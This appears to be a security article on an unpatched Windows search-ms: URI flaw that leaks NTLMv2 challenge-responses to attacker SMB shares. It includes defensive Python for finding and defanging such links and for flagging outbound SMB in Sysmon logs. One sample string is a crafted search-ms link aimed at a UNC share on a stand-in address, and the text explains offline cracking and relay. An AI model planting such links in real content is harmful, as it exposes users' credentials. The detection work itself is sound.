Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes

Quick Answer: The unpatched Windows Search URI vulnerability lets attackers capture NTLMv2 challenge-responses by forcing Windows to authenticate to a malicious SMB share. This happens when a user opens a crafted link or document, and the captured response can be cracked offline or relayed to other services that accept NTLM and...

An unpatched vulnerability in the Windows Search URI handler lets attackers capture NTLMv2 challenge-responses (Net-NTLMv2 hashes) through malicious search links; the only user interaction required is opening a crafted link or document. The attack abuses the built-in search-ms: protocol to make the victim's machine authenticate to an attacker-controlled SMB share, and the captured challenge-response can then be cracked offline or relayed to another service. For AI agent operators managing Windows-based infrastructure, this is a credential exposure that can compromise service accounts and open lateral movement paths.

How the Attack Works

The vulnerability lies in how Windows handles the search-ms: URI scheme when the search scope points at a remote location. When a user opens a link or document containing a search-ms URI whose location parameter is an attacker-controlled UNC path, Explorer opens that path as a search scope and the SMB client automatically authenticates to the share with the current user's credentials. This starts an NTLM challenge-response handshake: the attacker's server supplies the challenge and records the NTLMv2 response the victim computes from it.

Unlike traditional phishing, which needs the victim to type credentials, this attack requires nothing from the victim beyond opening the link. The capture rides on the normal Windows authentication flow, so it is invisible to the user and easily missed by endpoint protection that does not watch protocol-handler launches or outbound SMB. The captured NTLMv2 response can be brute-forced offline to recover the plaintext password, or relayed in real time to another service that accepts NTLM authentication. It is not usable for pass-the-hash: it is a response to one specific server challenge, not the NT hash itself, so it cannot be replayed as a credential the way an NT hash can.

The search-ms protocol is particularly dangerous because it is a legitimate Windows feature. Disabling it entirely may break enterprise search functionality, creating a tension between security and usability that defenders must navigate carefully.

Real-World Implications for AI Agent Deployments

AI agents operating on Windows hosts face amplified risk from this vulnerability. Agents that process external content (emails, documents, web pages, or user-generated attachments) may resolve a malicious URI in the course of normal workflow execution, for example by opening an attachment or following a link. Because many AI agents run with service account privileges, a successful capture can compromise high-value credentials with broad network access.

The bash tool environment in agent frameworks demonstrates the broader pattern of credential exposure through automated processing. As seen in Anthropic's agent toolset, even carefully designed environments require explicit scrubbing of sensitive variables like ANTHROPIC_API_KEY to prevent prompt-injected commands from extracting credentials. Similarly, Windows agents must now account for protocol handlers that silently leak authentication material without any explicit command execution.

Agents that parse HTML, markdown, or rich text from untrusted sources are especially exposed. A single malicious search-ms: link in a document the agent processes can trigger the hash leak even though no human ever sees the content. The trigger is resolution, not parsing: merely reading the link as text is harmless, but handing it to the shell (ShellExecute or os.startfile, opening the document in Explorer or Office, or navigating a browser to it) fires the handler and the SMB authentication that follows.
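The following is an added example, not code from the original article, showing the inspection step an agent pipeline (or a mail gateway) can run on untrusted text before anything resolves a link. It relies on the documented shape of the search-ms: scheme, in which the search scope is carried as `crumb=location:<path>`, and reports every search-ms/search link with the location it points at, marking those whose location is a UNC or file:// path as remote; `neutralize` then defangs every such link so a later ShellExecute cannot fire the handler. The sample text, the hostnames and the 203.0.113.10 address are constructed for the example.

```python
"""Find search-ms: links in untrusted text and report which ones point at remote shares."""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote

# Windows Search handles the search-ms: (and search:) scheme. Parameters are
# '&'-separated key=value pairs and the search scope is "crumb=location:<path>";
# a UNC path there makes Explorer open the share over SMB and the client
# authenticates with NTLM, which is the leak described above.
SEARCH_URI_RE = re.compile(r"(?i)\b(search-ms|search):(?://)?[^\s\"'<>)]+")


@dataclass
class Finding:
    uri: str
    location: Optional[str]   # value of crumb=location:, if present
    host: Optional[str]       # server name when the location is a UNC/file:// path
    remote: bool


def parse_params(uri: str) -> dict:
    """Split a search-ms/search URI into {key: [values]} with values URL-decoded."""
    body = uri.split(":", 1)[1].lstrip("/")   # drop the scheme and an optional //
    body = body.replace("&amp;", "&")         # links lifted straight out of HTML
    params: dict = {}
    for part in body.split("&"):
        key, _, value = part.partition("=")
        params.setdefault(key.strip().lower(), []).append(unquote(value))
    return params


def unc_host(location: str) -> Optional[str]:
    """Return the server from \\\\host\\share, //host/share or file://host/share, else None."""
    loc = location.strip()
    if loc.startswith(("\\\\", "//")):
        return loc[2:].replace("/", "\\").split("\\", 1)[0].lower() or None
    m = re.match(r"(?i)file://([^/\\]+)[/\\]", loc)
    return m.group(1).lower() if m else None


def inspect(text: str) -> list:
    """Return one Finding per search-ms/search link found in text."""
    findings = []
    for m in SEARCH_URI_RE.finditer(text):
        uri = m.group(0)
        crumbs = parse_params(uri).get("crumb", [])
        location = next((c.split(":", 1)[1] for c in crumbs
                         if c.lower().startswith("location:")), None)
        host = unc_host(location) if location else None
        findings.append(Finding(uri, location, host, host is not None))
    return findings


def neutralize(text: str) -> str:
    """Defang every search-ms/search link so no protocol handler fires if it is resolved later."""
    return SEARCH_URI_RE.sub(lambda m: m.group(0).replace(":", "[:]", 1), text)


# Constructed sample of content an agent might ingest; the UNC target uses a
# documentation address (203.0.113.10), not a real listener.
SAMPLE = (
    "Quarterly report: search-ms:query=report&crumb=location:C:\\Users\\Public\\Documents\n"
    '<a href="search-ms:query=invoice&amp;crumb=location%3A%5C%5C203.0.113.10%5Cshare'
    '&amp;displayname=Downloads">Open invoice</a>\n'
)

if __name__ == "__main__":
    for f in inspect(SAMPLE):
        print(("REMOTE  " if f.remote else "local   ") + f"{f.host or '-':<16} {f.uri}")
    print(neutralize(SAMPLE))
```

The second sample link shows the two tricks the inspector must survive: the UNC path is URL-encoded (`%5C%5C`) and the ampersands are HTML-escaped, so a naive substring search for `\\` misses it. The `displayname=Downloads` parameter is what the victim sees in the Explorer window; it says nothing about where the data comes from, which is why the decision is made on the location crumb alone. The policy the article recommends is stricter than the classification: defang every search-ms link from an external source, and use the remote flag only for triage.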

Detection and Defensive Measures

Detecting this attack means spotting NTLM authentication that a protocol handler initiated rather than normal file-share access. On the client, set the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Audit all (or Deny all): Windows then writes Event ID 8001 to the Microsoft-Windows-NTLM/Operational log for each outbound NTLM authentication, naming the target server and the client process. Correlate those with Sysmon Event ID 3 (network connection) records in which explorer.exe, a browser, an Office process, or the agent's host process opens TCP 445 to an address outside the corporate ranges. Windows Security Event ID 4624 is logged on the server being authenticated to, so it never appears for a connection to an attacker's listener; outbound-SMB logging at the egress firewall is the more reliable network-side signal.
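As an added example (not from the original article or any vendor), here is the network-side half of that correlation: a detector that reads Sysmon Event ID 3 records as JSON lines and raises an alert for every outbound SMB connection to an address outside the internal ranges, rated high when the initiating process is one that resolves URIs on a user's or agent's behalf. The Sysmon field names (Image, Initiated, DestinationIp, DestinationPort) are Sysmon's own; the internal-range list, the process list (including python.exe as the agent host) and the sample events are assumptions constructed for the example, and the external addresses are documentation ranges.

```python
"""Flag outbound SMB connections to addresses outside the corporate ranges
from processes that resolve URIs, using Sysmon Event ID 3 records."""
import ipaddress
import json
import ntpath
from dataclasses import dataclass

SMB_PORTS = {445, 139}

# Assumption: the organisation's internal space is RFC 1918 plus loopback and
# link-local. Add any public ranges you own before deploying this.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

# Processes that open a search-ms scope on a user's (or an agent's) behalf.
# Assumption: python.exe is the agent runtime's host process in this example.
URI_RESOLVERS = {"explorer.exe", "searchprotocolhost.exe", "searchhost.exe",
                 "msedge.exe", "chrome.exe", "firefox.exe",
                 "winword.exe", "excel.exe", "outlook.exe", "python.exe"}


@dataclass
class Alert:
    time: str
    computer: str
    image: str
    dest: str
    port: int
    severity: str


def is_external(ip: str) -> bool:
    """True when ip lies outside every network in INTERNAL_NETS."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def detect(lines):
    """Scan JSON-lines Sysmon events; return an Alert for each outbound SMB
    connection to an external address, rated high when a URI-resolving process made it."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") != 3 or str(ev.get("Initiated", "")).lower() != "true":
            continue
        port = int(ev["DestinationPort"])
        if port not in SMB_PORTS or not is_external(ev["DestinationIp"]):
            continue
        image = ntpath.basename(ev["Image"]).lower()
        severity = "high" if image in URI_RESOLVERS else "medium"
        alerts.append(Alert(ev["UtcTime"], ev["Computer"], image,
                            ev["DestinationIp"], port, severity))
    return alerts


# Constructed Sysmon Event ID 3 records (field names follow Sysmon's schema);
# the external addresses are documentation ranges, not real listeners.
SAMPLE_EVENTS = [
    r'{"EventID": 3, "UtcTime": "2024-05-02 10:15:01", "Computer": "WS-042", "Image": "C:\\Windows\\explorer.exe", "Initiated": "true", "DestinationIp": "10.20.3.5", "DestinationPort": 445}',
    r'{"EventID": 3, "UtcTime": "2024-05-02 10:15:09", "Computer": "WS-042", "Image": "C:\\Windows\\explorer.exe", "Initiated": "true", "DestinationIp": "203.0.113.10", "DestinationPort": 445}',
    r'{"EventID": 3, "UtcTime": "2024-05-02 10:16:30", "Computer": "AGENT-07", "Image": "C:\\Agent\\venv\\Scripts\\python.exe", "Initiated": "true", "DestinationIp": "198.51.100.7", "DestinationPort": 445}',
    r'{"EventID": 3, "UtcTime": "2024-05-02 10:16:31", "Computer": "AGENT-07", "Image": "C:\\Windows\\System32\\svchost.exe", "Initiated": "false", "DestinationIp": "203.0.113.10", "DestinationPort": 445}',
    r'{"EventID": 3, "UtcTime": "2024-05-02 10:17:02", "Computer": "WS-042", "Image": "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe", "Initiated": "true", "DestinationIp": "203.0.113.10", "DestinationPort": 443}',
    r'{"EventID": 1, "UtcTime": "2024-05-02 10:17:05", "Computer": "WS-042", "Image": "C:\\Windows\\explorer.exe"}',
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.severity:<6} {a.time} {a.computer} {a.image} -> {a.dest}:{a.port}")
```

Two of the six sample records alert: explorer.exe on WS-042 and the agent's python.exe on AGENT-07, both opening port 445 to the internet. The explorer.exe connection to 10.20.3.5 is ordinary file-share traffic, the inbound svchost record is the server side of someone else's connection, and the Edge connection is HTTPS, so none of them fire. Note that the internal-range check is an explicit list rather than Python's `is_private`, because `is_private` also treats the documentation ranges used here as non-global and an enterprise's own public allocations need to be added either way.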

For immediate mitigation, organizations can implement several layered controls:

  • Block search-ms URIs at the email gateway and web proxy: Filter these links before they reach endpoints, including URL-encoded and HTML-escaped forms. Most organizations have no legitimate business use for search-ms links arriving from external sources.
  • Block outbound SMB at the network edge: Deny TCP 445 and 139 from client and agent subnets to the internet, and log the attempts. A crafted URI cannot leak anything to an external listener if the SMB connection never leaves the network.
  • Disable NTLM where feasible: Move to Kerberos-only authentication for internal services to shrink the relay attack surface. Use the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" (Deny all, with the servers that still need NTLM listed as exceptions) to stop clients from answering challenges from arbitrary hosts.
  • Require SMB signing and EPA: Enforce SMB signing on servers, and enable Extended Protection for Authentication (channel binding) on HTTP and LDAP services, so a relayed NTLM response is rejected even if one is captured.
  • Network segmentation: Isolate agent workloads from general user networks to limit lateral movement if an agent service account is compromised.

Windows configuration baselines should explicitly restrict protocol handler behavior, for example by unregistering the search-ms handler on hosts that do not need it (it is registered under the search-ms key in HKEY_CLASSES_ROOT; back the key up before removing it). Where agents must process external documents, run them in sandboxed contexts without domain credentials, or under accounts with no access to sensitive network resources.

Urgency and Immediate Actions

This vulnerability remains unpatched, so exploitation needs no exploit development: a crafted URI and an attacker-controlled SMB listener are enough. The barrier to entry is low, and captured NTLMv2 responses are valuable in enterprise environments because they can be cracked offline without any further contact with the victim, or relayed while the session is live.

AI agent operators should prioritize three immediate actions:

  1. Audit agent workflows that parse or render external content on Windows hosts. Identify any paths where URIs are resolved rather than sanitized.
  2. Apply network-level blocks for search-ms and other high-risk protocol handlers at ingress points.
  3. Review service account permissions for agent processes and implement least-privilege access, ensuring that compromised credentials cannot pivot to critical infrastructure.

The original research and technical details on this vulnerability can be found at The Hacker News.

Key Takeaways

Protocol handlers like search-ms represent an under-examined attack surface in automated environments. AI agents magnify the impact because they process content at scale with privileged credentials, often without human oversight. Defending against NTLMv2 hash exposure requires a combination of network filtering, authentication hardening, and architectural isolation of agent workloads. Until a patch is available, assume that any Windows agent processing external content is a viable target for this attack chain.

Frequently Asked Questions

What is the Windows Search URI vulnerability?

The Windows Search URI vulnerability is an unpatched flaw in the Windows Search URI handler that enables attackers to capture NTLMv2 challenge-responses through malicious search-ms links.

How does the Windows Search URI vulnerability work?

The vulnerability works by forcing Windows to authenticate to an attacker-controlled SMB share when a user opens a malicious link or document containing a specially crafted search-ms URI.

What are the risks of the Windows Search URI vulnerability?

The risks of the Windows Search URI vulnerability include attackers capturing NTLMv2 challenge-responses, which can be brute-forced offline to recover the password or relayed to other services that accept NTLM authentication.